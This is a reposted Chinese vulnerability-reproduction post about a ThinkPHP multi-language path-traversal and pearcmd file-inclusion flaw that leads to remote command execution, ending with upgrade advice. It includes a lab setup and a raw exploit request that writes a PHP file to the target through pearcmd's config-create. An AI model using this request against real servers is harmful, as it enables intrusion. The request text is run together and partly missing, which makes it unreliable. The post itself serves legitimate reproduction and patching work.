文章目录 简介影响版本复现文件包含目录穿越 修复 简介 ThinkPHP 是一款 php 框架,如果开启了多语言功能,就可以通过 get、header、cookie 等位置传入参
ThinkPHP 是一款 php 框架,如果开启了多语言功能,就可以通过 get、header、cookie 等位置传入参数实现目录穿越和文件包含,从而利用 pearcmd 文件包含实现远程命令执行(RCE)。
需要Thinkphp开启多语言功能
2、需要有pearcmd扩展
v6.0.1 < Thinkphp < v6.0.13
Thinkphp v5.0.x
Thinkphp v5.1.x
环境
Docker run -it -d -p 8080:80 vulfocus/thinkphp:6.0.12访问8080生成文件
GET /public/index.php?+config-create+/+/tmp/hello.php Http/1.1Host: 222.x.x.x:8080accept: **;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Cache-Control: max-age=0若无必要,可关闭多语言功能,可参考文档
https://www.kancloud.cn/manual/thinkphp6_0/1037637
https://static.kancloud.cn/manual/thinkphp5/118132
2、官方已发布6.0.14、5.1.42,建议升级至安全版本。
来源地址:https://blog.csdn.net/qq_45751902/article/details/128268853
--结束END--
本文标题: [漏洞复现]Thinkphp RCE
本文链接: https://www.lsjlt.com/news/410113.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
官方手机版
微信公众号
商务合作
0